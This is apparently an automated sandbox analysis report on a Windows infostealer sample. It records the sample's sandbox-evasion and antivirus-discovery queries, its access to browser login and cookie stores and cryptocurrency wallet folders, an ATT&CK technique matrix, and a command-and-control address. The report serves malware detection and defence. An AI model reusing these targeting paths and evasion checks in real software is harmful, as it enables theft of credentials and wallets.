                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeMemory allocated: 3140000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeMemory allocated: 3370000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeMemory allocated: 3180000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeWindow / User API: threadDelayed 1183Jump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeWindow / User API: threadDelayed 5083Jump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe TID: 3752Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe TID: 4908Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe TID: 6568Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1780654103.00000000017B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeQueries volume information: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1785137566.0000000006B8D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe.ff0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.1644070008.0000000000FF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1781147161.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe PID: 5052, type: MEMORYSTR
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.000000000360E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.000000000360E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $dq1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxxLiberty
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.000000000360E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.000000000360E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.000000000360E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.000000000360E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.000000000360E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $dq5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                      Source: Yara matchFile source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe.ff0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.1644070008.0000000000FF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe PID: 5052, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe.ff0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.1644070008.0000000000FF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1781147161.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe PID: 5052, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      Process Injection
                      1
                      Masquerading
                      1
                      OS Credential Dumping
                      231
                      Security Software Discovery
                      Remote Services1
                      Archive Collected Data
                      1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      LSASS Memory1
                      Process Discovery
                      Remote Desktop Protocol3
                      Data from Local System
                      11
                      Non-Standard Port
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)241
                      Virtualization/Sandbox Evasion
                      Security Account Manager241
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Process Injection
                      NTDS1
                      Application Window Discovery
                      Distributed Component Object ModelInput Capture12
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Obfuscated Files or Information
                      LSA Secrets113
                      System Information Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Timestomp
                      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      DLL Side-Loading
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe100%AviraHEUR/AGEN.1305500
                      a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      api.ip.sb0%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe
                      http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                      http://tempuri.org/0%URL Reputationsafe
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                      https://www.ecosia.org/newtab/0%URL Reputationsafe
                      https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2004/08/addressing0%URL Reputationsafe
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                      https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                      https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                      https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/soap/actor/next0%URL Reputationsafe
                      https://ipinfo.io/ip%appdata%0%Avira URL Cloudsafe
                      http://185.38.142.10:74740%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/CheckConnectResponse0%Avira URL Cloudsafe
                      https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                      https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                      https://ipinfo.io/ip%appdata%0%VirustotalBrowse
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX0%Avira URL Cloudsafe
                      http://schemas.datacontract.org/2004/07/0%Avira URL Cloudsafe
                      http://185.38.142.10:747412%VirustotalBrowse
                      http://tempuri.org/Endpoint/EnvironmentSettings0%Avira URL Cloudsafe
                      https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%Avira URL Cloudsafe
                      https://api.ip.sb0%Avira URL Cloudsafe
                      https://api.ip.sb/geoip0%Avira URL Cloudsafe
                      http://schemas.datacontract.org/2004/07/0%VirustotalBrowse
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX0%VirustotalBrowse
                      https://api.ip.sb0%VirustotalBrowse
                      https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                      https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%VirustotalBrowse
                      http://tempuri.org/Endpoint/CheckConnectResponse1%VirustotalBrowse
                      https://api.ip.sb/geoip0%VirustotalBrowse
                      http://tempuri.org/Endpoint/CheckConnect0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/VerifyUpdateResponse0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/SetEnviron0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/EnvironmentSettings2%VirustotalBrowse
                      http://tempuri.org/Endpoint/SetEnvironment0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/SetEnvironmentResponse0%Avira URL Cloudsafe
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
                      http://185.38.142.10:7474/0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/GetUpdates0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/SetEnviron1%VirustotalBrowse
                      https://api.ipify.orgcookies//settinString.Removeg0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/SetEnvironment1%VirustotalBrowse
                      http://tempuri.org/Endpoint/CheckConnect2%VirustotalBrowse
                      http://185.38.142.10:7474/12%VirustotalBrowse
                      http://tempuri.org/Endpoint/GetUpdatesResponse0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/SetEnvironmentResponse1%VirustotalBrowse
                      185.38.142.10:74740%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/GetUpdates1%VirustotalBrowse
                      http://185.38.142.100%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/GetUpdatesResponse1%VirustotalBrowse
                      http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/VerifyUpdateResponse1%VirustotalBrowse
                      http://tempuri.org/00%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/VerifyUpdate0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/EnvironmentSettingsResponse1%VirustotalBrowse
                      http://tempuri.org/00%VirustotalBrowse
                      http://185.38.142.1012%VirustotalBrowse
                      185.38.142.10:747412%VirustotalBrowse
                      http://tempuri.org/Endpoint/VerifyUpdate1%VirustotalBrowse
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.ip.sb
                      unknown
                      unknowntrueunknown
                      NameMaliciousAntivirus DetectionReputation
                      http://185.38.142.10:7474/true
                      • 12%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      185.38.142.10:7474true
                      • 12%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://ipinfo.io/ip%appdata%a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exefalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/chrome_newtabtmp78A1.tmp.0.dr, tmp78C2.tmp.0.dr, tmp78B2.tmp.0.dr, tmp78D3.tmp.0.dr, tmp78E4.tmp.0.dr, tmpB297.tmp.0.dr, tmpB266.tmp.0.dr, tmp78E3.tmp.0.dr, tmpB298.tmp.0.dr, tmpB245.tmp.0.dr, tmpB267.tmp.0.dr, tmpB256.tmp.0.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/ac/?q=tmp78A1.tmp.0.dr, tmp78C2.tmp.0.dr, tmp78B2.tmp.0.dr, tmp78D3.tmp.0.dr, tmp78E4.tmp.0.dr, tmpB297.tmp.0.dr, tmpB266.tmp.0.dr, tmp78E3.tmp.0.dr, tmpB298.tmp.0.dr, tmpB245.tmp.0.dr, tmpB267.tmp.0.dr, tmpB256.tmp.0.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icotmp78A1.tmp.0.dr, tmp78C2.tmp.0.dr, tmp78B2.tmp.0.dr, tmp78D3.tmp.0.dr, tmp78E4.tmp.0.dr, tmpB297.tmp.0.dr, tmpB266.tmp.0.dr, tmp78E3.tmp.0.dr, tmpB298.tmp.0.dr, tmpB245.tmp.0.dr, tmpB267.tmp.0.dr, tmpB256.tmp.0.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://185.38.142.10:7474a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmp, a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003401000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 12%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousa591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Endpoint/CheckConnectResponsea591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.datacontract.org/2004/07/a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003401000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXa591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpfalse
